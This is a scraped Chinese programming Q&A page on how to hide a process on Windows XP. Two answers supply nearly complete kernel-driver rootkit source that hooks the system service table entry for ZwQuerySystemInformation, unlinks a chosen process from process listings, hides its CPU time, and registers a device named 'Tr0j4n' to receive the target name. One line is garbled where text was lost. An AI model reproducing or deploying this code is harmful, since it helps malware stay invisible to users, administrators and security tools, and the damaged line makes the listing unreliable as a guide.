关于网友提出的“ 如何隐藏进程�”问题疑问,本网通过在网上对“ 如何隐藏进程�”有关的相关答案进行了整理,供用户进行参考,详细问题解答如下:
问题: 如何隐藏进程
描述: 请看:
typedef DWORD (CALLBACK* LPR)(DWORD,DWORD);
HINSTANCE hDLL;
LPR lpRegisterServiceProcess;
hDLL = LoadLibrary("kernel32.dll");
lpRegisterServiceProcess = (LPR)GetProcAddress(hDLL,"RegisterServiceProcess");
if(lpRegisterServiceProcess)
lpRegisterServiceProcess(GetCurrentProcessId(),1);
但据说这个代码必须在win98下运行,可是我的系统是XP,请问:该怎么隐藏进程?
解决方案1:
VOID DriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
PDEVICE_OBJECT pNextObj;
PDEVICE_EXTENSION pDevExt;
UNICODE_STRING pLinkName;
DbgPrint("DriverUnload!\n");
UNHOOK_SYSCALL( ZwQuerySystemInformation, OldZwQuerySystemInformation, NewZwQuerySystemInformation );
if(g_pmdlSystemCall)
{
MmUnmapLockedPages(MappedSystemCallTable, g_pmdlSystemCall);
IoFreeMdl(g_pmdlSystemCall);
}
pNextObj=pDriverObject->DeviceObject;
while(pNextObj!=NULL)
{
pDevExt=(PDEVICE_EXTENSION)pNextObj->DeviceExtension;
pLinkName=pDevExt->ustrSymLinkName;
IoDeleteSymbolicLink(&pLinkName);
pNextObj=pNextObj->NextDevice;
IoDeleteDevice(pDevExt->pDevice);
}
DbgPrint("DriverUnload Complete!\n");
}
NTSTATUS DDKDispatchRoutine(
IN PDEVICE_OBJECT pDeviceObj,
IN PIRP pIrp)
{
NTSTATUS status=STATUS_SUCCESS;
DbgPrint("Enter DDKDispatchRoutine \n");
DbgPrint("Leave DispatchRoutine\n");
return status;
}
NTSTATUS DDKDeviceIoControl(IN PDEVICE_OBJECT pDevObj,
IN PIRP pIrp)
{
NTSTATUS status = STATUS_SUCCESS;
UNICODE_STRING uniStr;
ANSI_STRING aniStr;
PIO_STACK_LOCATION stack;
ULONG cbin,cbout,code,info;
DbgPrint(("Enter DeviceIOControl\n"));
stack = IoGetCurrentIrpStackLocation(pIrp);
cbin = stack->Parameters.DeviceIoControl.InputBufferLength;
cbout = stack->Parameters.DeviceIoControl.OutputBufferLength;
//得到IOCTL码
code = stack->Parameters.DeviceIoControl.IoControlCode;
info = cbout;
switch (code)
{ // process request
case IOCTL_FUCK:
{
DbgPrint(" IOCTL_FUCK\n");
//缓冲区方式IOCTL
//显示输入缓冲区数据
InputBuffer = (UCHAR *)pIrp->AssociatedIrp.SystemBuffer;
DbgPrint("length is %d %d\n",cbin,cbout);
DbgPrint("The input buffer is %s\n",InputBuffer);
RtlInitAnsiString(&aniStr,InputBuffer);
RtlAnsiStringToUnicodeString(&uniStr,&aniStr,TRUE);
Pr />
//操作输出缓冲区
//设置实际操作输出缓冲区长度
info = cbout;
break;
}
default:
status = STATUS_INVALID_VARIANT;
}
// 完成IRP
pIrp->IoStatus.Status = status;
pIrp->IoStatus.Information = info;
IoCompleteRequest( pIrp, IO_NO_INCREMENT );
MappedSystemCallTable = MmMapLockedPages(g_pmdlSystemCall, KernelMode);
HOOK_SYSCALL( ZwQuerySystemInformation, NewZwQuerySystemInformation, OldZwQuerySystemInformation );
return status;
}
#pragma INITCODE
NTSTATUS DriverEntry(
IN PDRIVER_OBJECT pDriverObject,
IN PUNICODE_STRING pRegistryPath)
{
NTSTATUS status;
pDriverObject->DriverUnload=DriverUnload;
DbgPrint("DriverEntry Started!\n");
status=CreateDevice(pDriverObject);
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=DDKDeviceIoControl;
pDriverObject->MajorFunction[IRP_MJ_CREATE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_CLOSE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_READ]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_WRITE]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_CLEANUP]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SET_INFORMATION]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SHUTDOWN]=DDKDispatchRoutine;
pDriverObject->MajorFunction[IRP_MJ_SYSTEM_CONTROL]=DDKDispatchRoutine;
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
OldZwQuerySystemInformation =(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
g_pmdlSystemCall = MmCreateMdl(NULL, KeServiceDescriptorTable.ServiceTableBase, KeServiceDescriptorTable.NumberOfServices*4);
if(!g_pmdlSystemCall)
return STATUS_UNSUCCESSFUL;
MmBuildMdlForNonPagedPool(g_pmdlSystemCall);
g_pmdlSystemCall->MdlFlags = g_pmdlSystemCall->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA;
DbgPrint("DriverEntry Ended!\n");
return STATUS_SUCCESS;
}
解决方案2: 帮助你下吧,我把我硬盘里的那个代码就吐血奉献出来给你了。
#pragma once
#include
#include "drvcommon.h"
#include "drvversion.h"
#define INITCODE code_seg("INIT")
#define IOCTL_FUCK CTL_CODE(\
FILE_DEVICE_UNKNOWN, \
0x800, \
METHOD_BUFFERED, \
FILE_ANY_ACCESS)
typedef struct _DEVICE_EXTENSION{
PDEVICE_OBJECT pDevice;
UNICODE_STRING ustrDeviceName;
UNICODE_STRING ustrSymLinkName;
}DEVICE_EXTENSION,*PDEVICE_EXTENSION;
typedef struct ServiceDescriptorEntry {
unsigned int *ServiceTableBase;
unsigned int *ServiceCounterTableBase;
unsigned int NumberOfServices;
unsigned char *ParamTableBase;
} ServiceDescriptorTableEntry_t, *PServiceDescriptorTableEntry_t;
__declspec(dllimport) ServiceDescriptorTableEntry_t KeServiceDescriptorTable;
#define SYSTEMSERVICE(_function) KeServiceDescriptorTable.ServiceTableBase[ *(PULONG)((PUCHAR)_function+1)]
PMDL g_pmdlSystemCall;
PVOID *MappedSystemCallTable;
UCHAR* InputBuffer;
PWSTR ProName;
#define SYSCALL_INDEX(_Function) *(PULONG)((PUCHAR)_Function+1)
#define HOOK_SYSCALL(_Function, _Hook, _Orig ) \
_Orig = (PVOID) InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
#define UNHOOK_SYSCALL(_Function, _Hook, _Orig ) \
InterlockedExchange( (PLONG) &MappedSystemCallTable[SYSCALL_INDEX(_Function)], (LONG) _Hook)
struct _SYSTEM_THREADS
{
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientIs;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
ULONG ThreadState;
KWAIT_REASON WaitReason;
};
struct _SYSTEM_PROCESSES
{
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
struct _SYSTEM_THREADS Threads[1];
};
struct _SYSTEM_PROCESSOR_TIMES
{
LARGE_INTEGER IdleTime;
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER DpcTime;
LARGE_INTEGER InterruptTime;
ULONG InterruptCount;
};
NTSYSAPI
NTSTATUS
NTAPI ZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength);
typedef NTSTATUS (*ZWQUERYSYSTEMINFORMATION)(
ULONG SystemInformationCLass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
ZWQUERYSYSTEMINFORMATION OldZwQuerySystemInformation;
LARGE_INTEGER m_UserTime;
LARGE_INTEGER m_KernelTime;
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation)) (
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength );
if( NT_SUCCESS(ntStatus))
{
if(SystemInformationClass == 5)
{
struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
struct _SYSTEM_PROCESSES *prev = NULL;
while(curr)
{
if (curr->ProcessName.Buffer != NULL)
{
if(0 == memcmp(curr->ProcessName.Buffer,ProName, wcslen(ProName)))
{
m_UserTime.QuadPart += curr->UserTime.QuadPart;
m_KernelTime.QuadPart += curr->KernelTime.QuadPart;
if(prev)
{
if(curr->NextEntryDelta)
prev->NextEntryDelta += curr->NextEntryDelta;
else
prev->NextEntryDelta = 0;
}
else
{
if(curr->NextEntryDelta)
{
(char *)SystemInformation += curr->NextEntryDelta;
}
else
SystemInformation = NULL;
}
}
}
else
{
curr->UserTime.QuadPart += m_UserTime.QuadPart;
curr->KernelTime.QuadPart += m_KernelTime.QuadPart;
m_UserTime.QuadPart = m_KernelTime.QuadPart = 0;
}
prev = curr;
if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
else curr = NULL;
}
}
else if (SystemInformationClass == 8)
{
struct _SYSTEM_PROCESSOR_TIMES * times = (struct _SYSTEM_PROCESSOR_TIMES *)SystemInformation;
times->IdleTime.QuadPart += m_UserTime.QuadPart + m_KernelTime.QuadPart;
}
}
return ntStatus;
}
NTSTATUS CreateDevice(
IN PDRIVER_OBJECT pDriverObject)
{
NTSTATUS status;
PDEVICE_OBJECT pDevObj;
PDEVICE_EXTENSION pDevExt;
UNICODE_STRING szDevName,symLinkName;
RtlInitUnicodeString(&szDevName,L"\\Device\\Tr0j4nDevice");
status=IoCreateDevice(pDriverObject,
sizeof(DEVICE_EXTENSION),
&szDevName,
FILE_DEVICE_UNKNOWN,
FILE_DEVICE_SECURE_OPEN,
TRUE,
&pDevObj);
if(!NT_SUCCESS(status))
{
DbgPrint("IoCreateDevice UnOK!\n");
return status;
}
else
DbgPrint("IoCreateDevice OK!\n");
pDevObj->Flags|=DO_BUFFERED_IO;
pDevExt=(PDEVICE_EXTENSION)pDevObj->DeviceExtension;
pDevExt->pDevice=pDevObj;
pDevExt->ustrDeviceName=szDevName;
RtlInitUnicodeString(&symLinkName,L"\\??\\Tr0j4n");
pDevExt->ustrSymLinkName=symLinkName;
status=IoCreateSymbolicLink(&symLinkName,&szDevName);
if(!NT_SUCCESS(status))
{
DbgPrint("IoCreateSymbolicLink UnOK");
IoDeleteDevice(pDevObj);
return status;
}
else
DbgPrint("IoCreateSymbolicLink OK");
return STATUS_SUCCESS;
}
解决方案3: http://www.csip.com.cn/26/n-36926.html
以上介绍了“ 如何隐藏进程”的问题解答,希望对有需要的网友有所帮助。
本文网址链接:http://www.codes51.com/itwd/3295051.html
